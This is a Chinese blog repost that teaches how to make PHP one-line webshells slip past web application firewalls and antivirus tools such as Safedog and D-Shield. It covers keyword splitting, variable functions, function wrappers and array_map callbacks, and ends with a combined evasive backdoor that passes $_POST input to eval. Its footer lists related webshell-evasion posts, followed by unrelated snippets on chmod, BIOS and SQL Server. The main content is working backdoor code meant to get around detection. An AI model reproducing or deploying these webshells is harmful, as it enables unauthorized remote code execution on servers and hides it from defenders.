原文转载于:http://www.legendsec.org/1701.html

觉得写得还算蛮科普的。

00x1.关键字拆分。
         比如assert,可以写成 ‘a’.’ss’.’e’.’r’.’t’这样。
         总结:这种方法虽然简单,但是却没有太强的免杀功效,需要结合其他方法。

00x2.可变变量、引用、可变函数。

可变变量  比如$a=$_POST[‘x’];$b=’a’;@eval($$b);
        测试结果:
        总结:这种方法对狗等WAF可以绕过哦~但是对于D盾这种多规则的是无效的!

引用  比如$a=$_POST[‘x’];$b=&$a;@eval($b);
        测试结果: 

总结:这种方法与上一种方法类似。

可变函数  比如$a=’a’.’ss’.’e’.’r’.’t’;$a($_POST[‘x’]);
        测试结果: 
        总结:这种方法对于狗、3卫士、D盾之类的均没有作用哦~

00x3.添加其他代码。

添加其他代码  比如  if(empty($a))

{
                                              $a=$_POST[‘x’];
                                       }

@eval($a);
        测试结果: 
        总结:这种方法比较适合脑洞比较大的小伙伴们~

00x4.函数替换。

使用其他函数,比如eval可以使用assert替换。

总结:这种方法适合eval函数被禁用时使用哦~

00x5.封装到新的函数中。

新定义一个函数,使其封装到新函数中。

function test($a){   //定义一个名为test的函数,并使用$a接受参数

eval($a);

}

test($_POST[‘x’]);

测试结果: 
       总结:这种方法适合有PHP基础的人哦,姿势风骚~不怕不过!

00x6.函数回调。

使用其他函数进行调用,并执行。

如:array_map(‘a’.’s’.’se’.’r’.’t’,array($_POST[‘x’]));
       测试结果: 
       总结:这种方法适合有PHP基础的人哦~这种方法绝对过WAF哦~

00x7.利用各种方法的特性写出过WAF的一句话。
       <?php
function test($a){      //利用所学的封装函数
if (empty($a)){       //利用所学的添加其他代码
$a=”echo ‘QQ:xxxxxxx’;”;      //使用这句代码扰乱D盾的判断
}
@eval($a);
}
@test($_POST[‘x’]);
?>

测试结果: 

THE END


PHP一句话过狗、卫士、D盾等免杀思路!的更多相关文章

  1. 免杀PHP一句话一枚

    免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23&q ...

  2. PHP一句话简单免杀

    PHP一句话简单免杀 原型 几种已经开源的免杀思路 拆解合并 <?php $ch = explode(".","hello.ev.world.a.l"); ...

  3. 绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

    这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法. 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测. 废话不多说,切入正题.... 1.实验环境: Win ...

  4. PHP一句话木马Webshell变形免杀总结

    0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不 ...

  5. 免杀ASP一句话

    <% wei="日日日)""wei""(tseuqer lave 日" execute(UnEncode(wei)) function ...

  6. 关于php一句话免杀的分析<转载>

    一开始想这样:   <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什 ...

  7. php中转菜刀脚本过狗免杀

    <?php $target="url";//shell 地址 菜刀连这个脚本做中转 $post=''; $i=0; foreach($_POST AS $K=>$V) ...

  8. 一句话木马:PHP篇

    珍藏版: 一个简单的过D盾的免杀php <?php $ab = $_REQUEST['d']; $a['t'] = "";//主要带对象 D盾就不管后面的了... eval( ...

  9. Webshell免杀研究

    前言 不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗.D盾.护卫神.云锁等安全软 ...

随机推荐

  1. chmod 和 chown 的用法

    一.chown 命令 用途:更改文件的所有者或组.命令由单词change owner组合而成. 使用示例: 1,更改文件的所有者: chown jim program.c 文件 program.c 的 ...

  2. BIOS设置教程

    BIOS设置图解教程之AMI篇 BIOS设置图解教程之AMI篇(目前主板上常见的BIOS主要为AMI与AWARD两个系列,如何辨别BIOS品牌系列请移步,本文详细讲解AMI系列的BIOS设置图解教程, ...

  3. 《CSS3实战》读书笔记 第2章 层叠样式表(CSS)

    ## 层叠样式表 本章将阐述CSS的基本规则. ### 解构CSS 所谓CSS,由选择器(selector)和声明块(declaration block)组成.再进一步细分,每个声明包括了属性和值. ...

  4. Bindless Textures

    http://shikihuiku.wordpress.com/2014/02/10/openglのtextureについて/

  5. cannot start session without errors

    访问phpmyadmin出现如标题错误,解决方案如下: cd /var/lib/php 更改目录权限chown nginx:nginx -R session/ That's All!

  6. ecshop 订单-》设置默认收货地址,或者删除

    设置位置:ecs_users标的   country字段,默认是0,默认地址是 users_address 的address_id 设置默认收货地址 /** * 设置默认地址 * * @access ...

  7. live555在Raspberry Pi上的点播/直播

    1.live555在Raspberry Pi上的点播 live555MediaServer这个实例是个简单的服务器,支持多媒体点播,直接在Raspberry Pi上编译运行,或者通过交叉编译出ARM核 ...

  8. Yii 框架里数据库操作详解-[增加、查询、更新、删除的方法 'AR模式']

    public function getMinLimit () {        $sql = "...";        $result = yii::app()->db-& ...

  9. SqlServer 18456 错误解决方案

    sqlserver 安装需注意事项:  不要选择,否则运行一段时间后sqlserver登录时会出现18456错误. 发生18456错误(sa 可登录的情况下)解决本地用户登录问题的方案: <1& ...

  10. 存储过程中的when others then 和 raise

    EXCEPTION when others then rollback; dbms_output.put_line('code:' || sqlcode); dbms_output.put_line( ...